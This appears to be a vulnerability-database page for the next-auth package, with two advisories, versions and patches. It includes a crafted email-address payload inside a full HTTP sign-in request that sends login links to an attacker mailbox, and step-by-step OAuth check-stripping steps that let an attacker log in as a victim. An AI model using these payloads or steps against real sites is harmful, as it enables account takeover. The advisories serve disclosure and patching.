NodeJS/next-auth/4.3.2

Authentication for Next.js

https://www.npmjs.com/package/next-auth
ISC

8 Security Vulnerabilities

NextAuthjs Email misdelivery Vulnerability

Published date: 2025-10-29T10:43:57Z
Links:

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version Afftected
4.24.11 Yes
5.0.0-beta.29 Yes

POC

Example Setup showing misdelivery of email 

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@auth/prisma-adapter"
import { prisma } from "@/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})


POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin

Screenshot from 2025-10-25 21-15-25 Screenshot from 2025-10-25 21-14-47

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Affected versions: ["5.0.0-beta.29", "5.0.0-beta.28", "5.0.0-beta.27", "5.0.0-beta.26", "5.0.0-beta.25", "5.0.0-beta.24", "5.0.0-beta.23", "5.0.0-beta.22", "5.0.0-beta.21", "5.0.0-beta.20", "5.0.0-beta.19", "5.0.0-beta.18", "5.0.0-beta.17", "5.0.0-beta.16", "5.0.0-beta.15", "5.0.0-beta.14", "5.0.0-beta.13", "5.0.0-beta.12", "5.0.0-beta.11", "5.0.0-beta.10", "5.0.0-beta.9", "5.0.0-beta.8", "5.0.0-beta.7", "5.0.0-beta.6", "5.0.0-beta.5", "5.0.0-beta.4", "5.0.0-beta.3", "5.0.0-beta.2", "5.0.0-beta.1", "5.0.0-beta.0", "4.24.11", "4.24.10", "4.24.9", "4.24.8", "4.24.7", "4.24.6", "4.24.5", "4.24.4", "4.24.3", "4.24.2", "4.24.1", "4.24.0", "4.23.2", "4.23.1", "4.23.0", "4.22.5", "4.22.4", "4.22.3", "4.22.2", "4.22.1", "4.22.0", "4.21.1", "4.21.0", "4.20.1", "4.20.0", "4.19.2", "4.19.1", "4.19.0", "4.18.10", "4.18.9", "4.18.8", "4.18.7", "4.18.6", "4.18.5", "4.18.4", "4.18.3", "4.18.2", "4.18.1", "4.18.0", "4.17.0", "4.16.4", "4.16.3", "4.16.2", "4.16.1", "4.16.0", "4.15.2", "4.15.1", "4.15.0", "4.14.0", "4.13.0", "4.12.3", "4.12.2", "4.12.1", "4.12.0", "4.11.0", "4.10.3", "4.10.2", "4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "4.0.0-next.26", "4.0.0-next.25", "4.0.0-next.24", "4.0.0-next.23", "4.0.0-next.22", "4.0.0-next.21", "4.0.0-next.20", "4.0.0-next.19", "4.0.0-next.18", "4.0.0-next.17", "4.0.0-next.16", "4.0.0-next.15", "4.0.0-next.14", "4.0.0-next.13", "4.0.0-next.12", "4.0.0-next.11", "4.0.0-next.10", "4.0.0-next.9", "4.0.0-next.8", "4.0.0-next.7", "4.0.0-next.6", "4.0.0-next.5", "4.0.0-next.4", "4.0.0-next.3", "4.0.0-next.2", "4.0.0-next.1", "4.0.0-beta.7", "4.0.0-beta.6", "4.0.0-beta.5", "4.0.0-beta.4", "4.0.0-beta.3", "4.0.0-beta.2", "4.0.0-beta.1", "3.29.10", "3.29.9", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

Missing proper state, nonce and PKCE checks for OAuth authentication

Published date: 2023-03-13T20:52:50Z
CVE: CVE-2023-27490
Links:

Impact

next-auth applications using OAuth provider versions before v4.20.1 are affected.

A bad actor who can spy on the victim's network or able to social engineer the victim to click a manipulated login link could intercept and tamper with the authorization URL to log in as the victim, bypassing the CSRF protection.

As an example, an attack can happen in the following scenario.

TL;DR: The attacker steals the victim's authenticated callback by intercepting and tampering with the authorization URL created by next-auth.

  1. The victim attempts to log in to the next-auth site. For example https://next-auth-example.vercel.app/

  2. next-auth sets the checks cookies according to how the OAuth provider is configured. In this case, state and pkce are set by default for the Google Provider. Screen Shot 2023-03-03 at 09 54 26

  3. The attacker intercepts the returned authorization URL, strips away the OAuth check (nonce, state, pkce), and returns the URL without the check to the victim's browser. For example: From https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=client_id&scope=openid%20email%20profile&response_type=code&redirect_uri=https%3A%2F%2Fnext-auth-example.vercel.app%2Fapi%2Fauth%2Fcallback%2Fgoogle&state=state&code_challenge=code_challenge&code_challenge_method=S256&service=lso&o2v=2&flowName=GeneralOAuthFlow to https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=client_id&scope=openid%20email%20profile&response_type=code&redirect_uri=https%3A%2F%2Fnext-auth-example.vercel.app%2Fapi%2Fauth%2Fcallback%2Fgoogle&service=lso&o2v=2&flowName=GeneralOAuthFlow. Notice the parameters state, code_challenge and code_verifier are removed from the victim's address bar.

  1. The victim attempts to log in using their OAuth account.

  2. The Authorization Server logs the victim in and calls back to the next-auth api/auth/callback/:providerIdendpoint. 5.1. The attacker intercepts and logs this callback URL for later use. 5.2. next-auth checks the callback call from OAuth Authorization Server (doesn't have checks) and compares the checks with the cookies set (has checks) at step 2. This check will fail, resulting in the victim isn't logged in. However, at this step, the Authorization Server has already accepted the victim's request to log in and generated/sent a code in the URL.

  3. The attacker now has an authorization URL with the code that the AS will exchange for valid access_token/id_token and can log in as the victim automatically. They can open a new browser window and paste in the URL logged at step 5.1 and log in as the victim.

Patches

We patched the vulnerability in next-auth v4.20.1 To upgrade, run one of the following: npm i next-auth@latest yarn add next-auth@latest pnpm add next-auth@latest

Workarounds

Upgrading to latest is the recommended way to fix this issue. However, using Advanced Initialization, developers can manually check the callback request for state, pkce, and nonce against the provider configuration, and abort the sign-in process if there is a mismatch. Check out the source code for help.

References

Affected versions: ["4.20.0", "4.19.2", "4.19.1", "4.19.0", "4.18.10", "4.18.9", "4.18.8", "4.18.7", "4.18.6", "4.18.5", "4.18.4", "4.18.3", "4.18.2", "4.18.1", "4.18.0", "4.17.0", "4.16.4", "4.16.3", "4.16.2", "4.16.1", "4.16.0", "4.15.2", "4.15.1", "4.15.0", "4.14.0", "4.13.0", "4.12.3", "4.12.2", "4.12.1", "4.12.0", "4.11.0", "4.10.3", "4.10.2", "4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "4.0.0-next.26", "4.0.0-next.25", "4.0.0-next.24", "4.0.0-next.23", "4.0.0-next.22", "4.0.0-next.21", "4.0.0-next.20", "4.0.0-next.19", "4.0.0-next.18", "4.0.0-next.17", "4.0.0-next.16", "4.0.0-next.15", "4.0.0-next.14", "4.0.0-next.13", "4.0.0-next.12", "4.0.0-next.11", "4.0.0-next.10", "4.0.0-next.9", "4.0.0-next.8", "4.0.0-next.7", "4.0.0-next.6", "4.0.0-next.5", "4.0.0-next.4", "4.0.0-next.3", "4.0.0-next.2", "4.0.0-next.1", "4.0.0-beta.7", "4.0.0-beta.6", "4.0.0-beta.5", "4.0.0-beta.4", "4.0.0-beta.3", "4.0.0-beta.2", "4.0.0-beta.1", "3.29.10", "3.29.9", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", 